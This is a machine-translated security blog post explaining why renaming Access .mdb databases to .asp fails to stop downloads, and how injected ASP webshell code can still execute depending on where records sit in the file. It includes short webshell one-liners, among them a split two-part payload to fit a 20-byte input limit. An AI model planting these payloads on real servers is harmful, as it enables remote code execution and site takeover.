Change mdb to asp-related disasters

Author: lake2 Source: http://blog.csdn.net/lake2/

Currently, it seems that mdb-format databases are frequently used to change to asp/asa to prevent downloading, but most of the time they do not work. Because we will get garbled characters when accessing the database through a browser, OK, now we can easily go to the database with the Internet Express. However, the database is just a little bit of fur. Intruders can also use this asp database to get webshell. If you are not clear about it, we suggest you first look at the disaster caused by mdb modification to asp.

Oh, I'm afraid. Why don't you change mdb to asp? The answer is yes. We can't waste food for some reason, right. The "change" text finally says: "... Illegal asp Code such as <% = 'a'-1%> is added to the database to completely prevent the database from being downloaded. Due to the illegal asp code, after inserting our webshell code and running it, it will only display the error of the previous illegal code, rather than executing our shell code ......". There are also articles on the Internet that create a table in the database and enter an incorrect asp code (for example, "<% asd %>") in the content "), then, an error occurs when accessing the asp database, and you cannot download it using the Internet Express.

Really? In fact, asp is interpreted and executed. If the shell we insert is executed before its error code ...... Hey, let's take a test first.

Create an Access database in the web directory, add tables, fields, and content at will, change the suffix to asp, and Access the database through a browser. garbled characters are displayed. Now add the content "<% lake2 %>" to a field in the table and access it again. Haha, an error occurred! See figure 1.

Continue adding content "<% execute (request (" lake2 ") %>" to the same table (simulate webshell insertion), and access asp database again. The error still persists. See figure 2, note the error message compared with figure 1.

No. The second error "Type Mismatch: execute

"Is an error when the execute function parameter is null, but the first is an error because the character" lake2 "does not conform to asp syntax. It indicates that the webshell we inserted later is executed before the previous error code. You can use UltraEdit to open the database and check the locations of "<% execute (request (" lake2 ") %>" and "<% lake2 %>.

So now we can conclude that the physical location of the new data in the same table of the access database is always before the old data.

We can use this to break through some limitations. For example, the server requires that only 20 bytes of input data. How can we inject shell code? We can write in two sentences: "<% Y = request (" x ") % >;< % execute (Y) %> ". Think about the sequence by yourself.

Generally, when an error code is inserted to create a new table, what is the case for creating a new table?

Try it by yourself. My conclusion is that the content of the newly created table is physically located behind the old table. Haha, the actual location of the error code for creating a new table to insert is after the content of other fields in the database. We can submit the shell code to the database and get webshell!

The solution to the above problems is also simple, as long as your error code is located in the database prior to the content of other fields. However, this seems unrealistic, because it requires you to first create a table that prevents downloading ...... Well, we can use the dynamic network method for reference.

There is a table named Dv_notdownload in the dynamic network database. The table type is "OLE object", and the data in it is long binary data. The name is used for anti-download.

During the test, I found that even if a shell is inserted into a table created earlier than Dv_notdownload, it cannot be executed. What is the conclusion above? Later, I learned that the content in the table is "<%". The asp file will first report an error because the close character "%>" is missing, do not execute any statement at all (the problem mentioned above is a complete sentence ). Well, you know how to do it: p